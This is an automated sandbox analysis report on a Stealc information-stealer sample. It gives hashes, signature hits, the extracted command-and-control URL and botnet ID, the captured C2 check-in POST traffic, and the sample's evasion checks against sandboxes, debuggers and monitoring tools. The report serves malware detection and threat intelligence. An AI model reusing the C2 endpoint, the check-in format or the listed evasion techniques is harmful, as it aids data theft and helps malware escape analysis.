Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1531601
MD5:adde8b6ddcd55de3dde9f4ee627cc469
SHA1:880f68fbfe3320a5aa1114ce977b7ea532d1be11
SHA256:069c5ce1632725647ebe8ee55088da4f22f79f8d8922a72f70c35a87bbbc9764
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 3448 cmdline: "C:\Users\user\Desktop\file.exe" MD5: ADDE8B6DDCD55DE3DDE9F4EE627CC469)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2050826095.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2091709653.000000000114E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 3448JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 3448JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.860000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-11T12:44:04.440396+020020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.860000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0086C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0086C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00869AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00869AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00867240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00867240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00869B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00869B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00878EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00878EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_008738B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00874910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00874910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0086DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0086DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0086E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0086E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0086ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0086ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00874570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00874570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0086F68A FindFirstFileA,0_2_0086F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00873EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00873EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0086F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0086F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_008616D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0086DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0086DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0086BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0086BE70

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFCAAEBGCAKKFIDBKJJHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 43 41 41 45 42 47 43 41 4b 4b 46 49 44 42 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 38 38 36 33 33 37 44 33 30 43 33 38 38 36 35 38 32 35 34 38 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 41 41 45 42 47 43 41 4b 4b 46 49 44 42 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 41 41 45 42 47 43 41 4b 4b 46 49 44 42 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------HCFCAAEBGCAKKFIDBKJJContent-Disposition: form-data; name="hwid"D9886337D30C3886582548------HCFCAAEBGCAKKFIDBKJJContent-Disposition: form-data; name="build"doma------HCFCAAEBGCAKKFIDBKJJ--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00864880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00864880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFCAAEBGCAKKFIDBKJJHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 43 41 41 45 42 47 43 41 4b 4b 46 49 44 42 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 38 38 36 33 33 37 44 33 30 43 33 38 38 36 35 38 32 35 34 38 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 41 41 45 42 47 43 41 4b 4b 46 49 44 42 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 41 41 45 42 47 43 41 4b 4b 46 49 44 42 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------HCFCAAEBGCAKKFIDBKJJContent-Disposition: form-data; name="hwid"D9886337D30C3886582548------HCFCAAEBGCAKKFIDBKJJContent-Disposition: form-data; name="build"doma------HCFCAAEBGCAKKFIDBKJJ--
                Source: file.exe, 00000000.00000002.2091709653.0000000001193000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2091709653.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2091709653.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2091709653.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2091709653.00000000011A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/5
                Source: file.exe, 00000000.00000002.2091709653.00000000011A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2091709653.00000000011C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpI
                Source: file.exe, 00000000.00000002.2091709653.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37I

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B990D60_2_00B990D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C380B80_2_00C380B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2E06E0_2_00C2E06E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B698610_2_00B69861
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BCA9B80_2_00BCA9B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2A98F0_2_00C2A98F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C291930_2_00C29193
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5C93D0_2_00B5C93D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AEC90F0_2_00AEC90F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1F27D0_2_00D1F27D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2FBF60_2_00C2FBF6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B22BEB0_2_00B22BEB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CCF3B40_2_00CCF3B4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C34B120_2_00C34B12
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3B4010_2_00C3B401
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C274120_2_00C27412
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C316C80_2_00C316C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B75ED60_2_00B75ED6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BBCE5B0_2_00BBCE5B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC97270_2_00BC9727
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D257750_2_00D25775
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 008645C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: tggnfgne ZLIB complexity 0.9947980416156671
                Source: file.exe, 00000000.00000003.2050826095.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00878680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00878680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00873720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00873720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\B288Z01C.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1829376 > 1048576
                Source: file.exeStatic PE information: Raw size of tggnfgne is bigger than: 0x100000 < 0x198800

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.860000.0.unpack :EW;.rsrc :W;.idata :W; :EW;tggnfgne:EW;tktydact:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;tggnfgne:EW;tktydact:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00879860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00879860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c4e60 should be: 0x1bf963
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: tggnfgne
                Source: file.exeStatic PE information: section name: tktydact
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C798C1 push ecx; mov dword ptr [esp], esi0_2_00C798DA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC10C0 push 5DBEC2C0h; mov dword ptr [esp], eax0_2_00CC1114
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4C0D6 push esi; mov dword ptr [esp], 5B88E23Eh0_2_00C4C62D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB20D2 push ecx; mov dword ptr [esp], esp0_2_00CB211A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C5B0E4 push 284E6957h; mov dword ptr [esp], ebx0_2_00C5B113
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C5B0E4 push eax; mov dword ptr [esp], edx0_2_00C5B137
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D120F7 push edi; mov dword ptr [esp], ebp0_2_00D12115
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE58E0 push edx; mov dword ptr [esp], eax0_2_00CE5928
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE58E0 push eax; mov dword ptr [esp], edx0_2_00CE5938
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE189D push ecx; mov dword ptr [esp], eax0_2_00CE18F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE189D push eax; mov dword ptr [esp], ebx0_2_00CE18F5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1D8BF push edx; mov dword ptr [esp], edi0_2_00D1DE76
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B990D6 push ecx; mov dword ptr [esp], eax0_2_00B9915F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B990D6 push 1B96A761h; mov dword ptr [esp], eax0_2_00B99171
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B990D6 push eax; mov dword ptr [esp], edx0_2_00B99180
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B990D6 push 0F2155B2h; mov dword ptr [esp], ecx0_2_00B991A1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B990D6 push eax; mov dword ptr [esp], esi0_2_00B991E5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B990D6 push 1DED5138h; mov dword ptr [esp], ebp0_2_00B99219
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B990D6 push 731F1E5Ah; mov dword ptr [esp], eax0_2_00B992DB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C380B8 push ecx; mov dword ptr [esp], ebp0_2_00C380D1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C380B8 push 58376BF9h; mov dword ptr [esp], eax0_2_00C380D9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C380B8 push ebx; mov dword ptr [esp], 37EECD3Eh0_2_00C380E2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C380B8 push esi; mov dword ptr [esp], ebp0_2_00C381EE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C380B8 push 03B9F842h; mov dword ptr [esp], eax0_2_00C3828F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C380B8 push 2062E7B2h; mov dword ptr [esp], edi0_2_00C38315
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C380B8 push edx; mov dword ptr [esp], eax0_2_00C383D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C380B8 push ecx; mov dword ptr [esp], eax0_2_00C3842C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C380B8 push ecx; mov dword ptr [esp], 7FFBDCEAh0_2_00C38486
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C380B8 push 4DD7416Ch; mov dword ptr [esp], esp0_2_00C38494
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C380B8 push 5B14CB31h; mov dword ptr [esp], esp0_2_00C38600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C380B8 push ebx; mov dword ptr [esp], 75ECB9B5h0_2_00C38612
                Source: file.exeStatic PE information: section name: tggnfgne entropy: 7.953565165226687

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00879860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00879860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13660
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC1EFF second address: AC1F03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C32CAA second address: C32CAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3F19E second address: C3F1B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jo 00007F885D5FB128h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3F1B3 second address: C3F1B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3F1B9 second address: C3F1BF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3F1BF second address: C3F1CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F885C786DECh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3F5F0 second address: C3F5F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3F88E second address: C3F892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3F892 second address: C3F8A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jns 00007F885D5FB126h 0x0000000f pop ecx 0x00000010 rdtsc
